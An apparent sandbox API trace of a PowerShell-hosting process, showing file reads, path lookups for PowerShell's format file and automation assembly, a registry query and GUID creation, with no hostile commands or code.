	[0040.205] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.205] GetLastError () returned 0x0
	[0040.205] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.205] GetLastError () returned 0x0
	[0040.205] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.205] GetLastError () returned 0x0
	[0040.206] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.206] GetLastError () returned 0x0
	[0040.206] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.206] GetLastError () returned 0x0
	[0040.206] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.206] GetLastError () returned 0x0
	[0040.206] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.207] GetLastError () returned 0x0
	[0040.207] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.207] GetLastError () returned 0x0
	[0040.207] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.207] GetLastError () returned 0x0
	[0040.207] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.207] GetLastError () returned 0x0
	[0040.208] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.208] GetLastError () returned 0x0
	[0040.208] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.208] GetLastError () returned 0x0
	[0040.208] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.208] GetLastError () returned 0x0
	[0040.209] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.209] GetLastError () returned 0x0
	[0040.209] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.209] GetLastError () returned 0x0
	[0040.209] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.209] GetLastError () returned 0x0
	[0040.209] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.210] GetLastError () returned 0x0
	[0040.210] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.210] GetLastError () returned 0x0
	[0040.210] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.210] GetLastError () returned 0x0
	[0040.210] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.211] GetLastError () returned 0x0
	[0040.211] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.211] GetLastError () returned 0x0
	[0040.211] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.211] GetLastError () returned 0x0
	[0040.211] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.211] GetLastError () returned 0x0
	[0040.212] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.212] GetLastError () returned 0x0
	[0040.212] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.212] GetLastError () returned 0x0
	[0040.212] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.212] GetLastError () returned 0x0
	[0040.213] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.213] GetLastError () returned 0x0
	[0040.213] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.213] GetLastError () returned 0x0
	[0040.213] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.213] GetLastError () returned 0x0
	[0040.213] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0040.214] GetLastError () returned 0x0
	[0040.214] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0xf37, lpOverlapped=0x0) returned 1
	[0040.214] GetLastError () returned 0x0
	[0040.214] ReadFile (in: hFile=0x300, lpBuffer=0x25bfafb, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25bfafb*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.214] GetLastError () returned 0x0
	[0040.214] ReadFile (in: hFile=0x300, lpBuffer=0x25c0424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x25c0424*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0040.214] GetLastError () returned 0x0
	[0040.214] CloseHandle (hObject=0x300) returned 1
	[0040.214] GetLastError () returned 0x0
	[0040.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0040.215] GetLastError () returned 0x0
	[0040.215] SetErrorMode (uMode=0x1) returned 0x1
	[0040.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e1420 | out: lpFileInformation=0x25e1420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0040.215] GetLastError () returned 0x0
	[0040.215] SetErrorMode (uMode=0x1) returned 0x1
	[0040.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0040.215] GetLastError () returned 0x0
	[0040.215] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x300) returned 0x0
	[0040.215] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x0, lpcbData=0x25e3cc*=0x0 | out: lpType=0x25e3d0*=0x1, lpData=0x0, lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.215] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x190b58, lpcbData=0x25e3cc*=0x56 | out: lpType=0x25e3d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e3cc*=0x56) returned 0x0
	[0040.216] RegCloseKey (hKey=0x300) returned 0x0
	[0040.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0040.216] GetLastError () returned 0x0
	[0040.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0040.216] GetLastError () returned 0x0
	[0040.237] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x97b9dd53, Data2=0x6d71, Data3=0x4e6c, Data4=([0]=0x8e, [1]=0x17, [2]=0x63, [3]=0x2d, [4]=0xa2, [5]=0x8c, [6]=0xf0, [7]=0xac))) returned 0x0
	[0040.237] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xf0e54019, Data2=0x7496, Data3=0x4e06, Data4=([0]=0xb9, [1]=0x7b, [2]=0xbc, [3]=0x3e, [4]=0xc5, [5]=0xf0, [6]=0xae, [7]=0x49))) returned 0x0
	[0040.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.237] GetLastError () returned 0x0
	[0040.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.237] GetLastError () returned 0x0
	[0040.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.237] GetLastError () returned 0x0
	[0040.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.237] GetLastError () returned 0x0
	[0040.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.275] GetLastError () returned 0x0
	[0040.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.275] GetLastError () returned 0x0
	[0040.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.275] GetLastError () returned 0x0
	[0040.275] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xc686f1fa, Data2=0x4f8c, Data3=0x469f, Data4=([0]=0xac, [1]=0x22, [2]=0xcb, [3]=0x25, [4]=0x4a, [5]=0x4d, [6]=0x21, [7]=0xf2))) returned 0x0
	[0040.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.275] GetLastError () returned 0x0
	[0040.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.275] GetLastError () returned 0x0
	[0040.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.275] GetLastError () returned 0x0
	[0040.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.275] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.276] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.276] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.276] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.276] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.276] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.276] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.276] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.276] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.276] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.276] GetLastError () returned 0x0
	[0040.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.277] GetLastError () returned 0x0
	[0040.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.277] GetLastError () returned 0x0
	[0040.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.277] GetLastError () returned 0x0
	[0040.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.277] GetLastError () returned 0x0
	[0040.278] VirtualQuery (in: lpAddress=0x25cd44, lpBuffer=0x25dd44, dwLength=0x1c | out: lpBuffer=0x25dd44*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.278] VirtualQuery (in: lpAddress=0x25cd80, lpBuffer=0x25dd80, dwLength=0x1c | out: lpBuffer=0x25dd80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.278] GetLastError () returned 0x0
	[0040.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.278] GetLastError () returned 0x0
	[0040.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.279] GetLastError () returned 0x0
	[0040.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.279] GetLastError () returned 0x0
